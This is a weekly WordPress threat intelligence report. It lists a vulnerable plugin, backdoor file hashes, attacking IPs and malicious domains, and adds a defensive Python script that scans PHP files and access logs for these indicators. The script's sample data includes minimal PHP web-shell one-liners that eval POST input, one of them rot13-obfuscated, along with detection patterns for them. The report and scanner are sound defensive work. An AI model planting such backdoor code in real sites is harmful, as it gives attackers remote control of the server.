Wordfence Weekly July 31 2019 – August 06 2019

A weekly report of noteworthy threat data by the Defiant threat intelligence team.

Notable Vulnerabilities

Name: Woody Ad Snippets <= 2.2.4 - Multiple Vulnerabilities
Description: The plugin's settings import is not protected by an access control check, so attackers can load attacker-controlled plugin settings, leading to stored XSS and possible remote code execution.
Type: A5 – Broken Access Control

Most Common New Infections

Malware samples found on the largest number of newly infected sites this week, identified by file MD5 and Wordfence signature name.

MD5 | Signature | Description | Example File Names
C62180F0D626D92E29E83778605DD8BE | Suspicious:PHP/eval_exit.92 | Obfuscated PHP backdoor. | file.php, i.php, ihqxkhi.php, and others
048648D9755220E727E7E0178837F7BF | Backdoor:PHP/561C.110 | PHP script which generates and executes a malicious binary. | amp3.php, sib.php, wpfunck.php, and others
8C9E8184A1523C7286FC11E7DE2EAC55 | Backdoor:PHP/2842.103 | PHP script which generates and executes a malicious binary. | wp_form7.php
BF3A65A77DA363AC779A2C45FD2DA2FF | Suspicious:PHP/eval_exit.92 | Obfuscated PHP backdoor. | common_config.php
446ABEFA504998F144A7AE906A173978 | Suspicious:PHP/rot13_of_eval.95 | Obfuscated, password-protected PHP backdoor. | b9448c1c.php

IPs Attacking Most Sites

Rank | Prev. | IP Address | ASN | Country
1 | - | 145.239.31.0 | 16276 (OVH SAS) | Poland (PL)
2 | - | 96.44.141.102 | 8100 (QuadraNet Enterprises LLC) | United States (US)
3 | - | 66.212.31.198 | 8100 (QuadraNet Enterprises LLC) | United States (US)
4 | - | 72.11.140.155 | 8100 (QuadraNet Enterprises LLC) | United States (US)
5 | - | 72.11.140.134 | 8100 (QuadraNet Enterprises LLC) | United States (US)
6 | - | 72.11.141.126 | 8100 (QuadraNet Enterprises LLC) | United States (US)
7 | - | 96.44.140.110 | 8100 (QuadraNet Enterprises LLC) | United States (US)
8 | - | 72.11.141.54 | 8100 (QuadraNet Enterprises LLC) | United States (US)
9 | 3 | 5.8.47.2 | 50896 (Trusov Ilya Igorevych) | Poland (PL)
10 | 2 | 35.226.130.240 | 15169 (Google LLC) | United States (US)

New Tracked Domains

Domain Name | Date Added | Current Status | Notes
psarips.net | 08/05/2019 | Up | Torrent site associated with malicious samples.
nulledhub.net | 08/05/2019 | Up | Nulled WordPress addon site associated with malicious samples.
joomlalock.com | 08/05/2019 | Up | Nulled Joomla addon site associated with malicious samples.
apkmod1.com | 08/05/2019 | Up | APK download site associated with malicious samples.
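The three tables above (sample hashes, attacking IPs, tracked domains) are most useful once they are checked against a site's files and logs. The script below is an added example and is not Wordfence or Defiant code: it copies the indicators from this report, hashes PHP files against the listed MD5s, applies two heuristics that are my own reading of the signature names (an eval() followed by exit()/die(), and a rot13 layer that decodes to an eval() call; they are not the vendor's actual signatures), flags references to the tracked domains, and matches access-log client IPs against the top-ten list. The PHP file contents and log lines are constructed for illustration.

```python
"""Triage this week's indicators against a site's PHP files and access log.

Added example, not Wordfence/Defiant code. Hashes, IPs and domains are copied
from the report tables; the PHP contents and log lines below are constructed.
The eval_exit and rot13_of_eval heuristics are assumptions about what those
signature names describe, not the vendor's signatures.
"""
import codecs
import hashlib
import re

# Indicators from the report tables (MD5s lower-cased for comparison).
KNOWN_MD5 = {
    "c62180f0d626d92e29e83778605dd8be": "Suspicious:PHP/eval_exit.92",
    "048648d9755220e727e7e0178837f7bf": "Backdoor:PHP/561C.110",
    "8c9e8184a1523c7286fc11e7de2eac55": "Backdoor:PHP/2842.103",
    "bf3a65a77da363ac779a2c45fd2da2ff": "Suspicious:PHP/eval_exit.92",
    "446abefa504998f144a7ae906a173978": "Suspicious:PHP/rot13_of_eval.95",
}
ATTACKER_IPS = {
    "145.239.31.0", "96.44.141.102", "66.212.31.198", "72.11.140.155",
    "72.11.140.134", "72.11.141.126", "96.44.140.110", "72.11.141.54",
    "5.8.47.2", "35.226.130.240",
}
TRACKED_DOMAINS = {"psarips.net", "nulledhub.net", "joomlalock.com", "apkmod1.com"}

# Heuristic (assumed): eval(...); immediately followed by exit or die.
EVAL_EXIT_RE = re.compile(r"\beval\s*\(.*?\)\s*;\s*(?:exit|die)\b", re.S)
# Heuristic (assumed): an eval( call that only appears after rot13 decoding.
EVAL_CALL_RE = re.compile(r"\beval\s*\(")
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def md5_hex(content: bytes) -> str:
    return hashlib.md5(content).hexdigest()


def classify_php(content: bytes, known_hashes=KNOWN_MD5) -> list:
    """Return the reasons (possibly none) to quarantine a PHP file."""
    reasons = []
    digest = md5_hex(content)
    if digest in known_hashes:
        reasons.append("hash:" + known_hashes[digest])
    text = content.decode("utf-8", errors="replace")
    if EVAL_EXIT_RE.search(text):
        reasons.append("heuristic:eval_exit")
    # rot13 is its own inverse, so decoding the whole file once exposes an
    # eval( hidden as riny( without locating the str_rot13() call first.
    if EVAL_CALL_RE.search(codecs.decode(text, "rot_13")):
        reasons.append("heuristic:rot13_of_eval")
    for host in URL_HOST_RE.findall(text):
        host = host.lower()
        if host.startswith("www."):
            host = host[4:]
        if host in TRACKED_DOMAINS:
            reasons.append("domain:" + host)
    return reasons


def scan_files(files: dict, known_hashes=KNOWN_MD5) -> dict:
    """Map path -> reasons for every file that produced at least one reason."""
    flagged = {}
    for path, content in files.items():
        reasons = classify_php(content, known_hashes)
        if reasons:
            flagged[path] = reasons
    return flagged


# Combined-log-format prefix: client IP, ident, user, timestamp, request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)"')


def attacker_hits(lines) -> list:
    """Return (ip, request) for log lines whose client IP is in the top-ten list."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m.group("ip") in ATTACKER_IPS:
            hits.append((m.group("ip"), m.group("req")))
    return hits


# Constructed sample data (not real infections or traffic; 203.0.113.7 is a
# documentation address standing in for an ordinary visitor).
SAMPLE_FILES = {
    "wp-content/uploads/i.php":
        b"<?php eval(base64_decode($_POST['p'])); exit; ?>",
    "wp-content/plugins/x/b9448c1c.php":
        b"<?php eval(str_rot13('vs(vffrg($_CBFG[\"c\"])){riny($_CBFG[\"c\"]);}'));",
    "wp-content/plugins/y/loader.php":
        b"<?php $u = 'http://www.nulledhub.net/check.php'; @file_get_contents($u);",
    "wp-content/plugins/z/z.php":
        b"<?php echo 'hello'; ?>",
}
SAMPLE_LOG = [
    '72.11.140.155 - - [05/Aug/2019:10:12:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412',
    '203.0.113.7 - - [05/Aug/2019:10:12:02 +0000] "GET /index.php HTTP/1.1" 200 8123',
    '5.8.47.2 - - [05/Aug/2019:10:12:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3401',
]

if __name__ == "__main__":
    for path, reasons in scan_files(SAMPLE_FILES).items():
        print(path, "->", ", ".join(reasons))
    for ip, req in attacker_hits(SAMPLE_LOG):
        print("attacker IP", ip, "requested", req)
```

The MD5 match is the weakest check, since repacking a backdoor changes the hash without changing its behaviour; the heuristics catch variants but will also flag legitimate code that happens to use the same constructs, so treat a heuristic hit as a prompt for manual review rather than an automatic delete. IP hits should be correlated with the request line and status code before blocking, because several of the listed addresses sit in hosting ranges where neighbouring customers are innocent.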
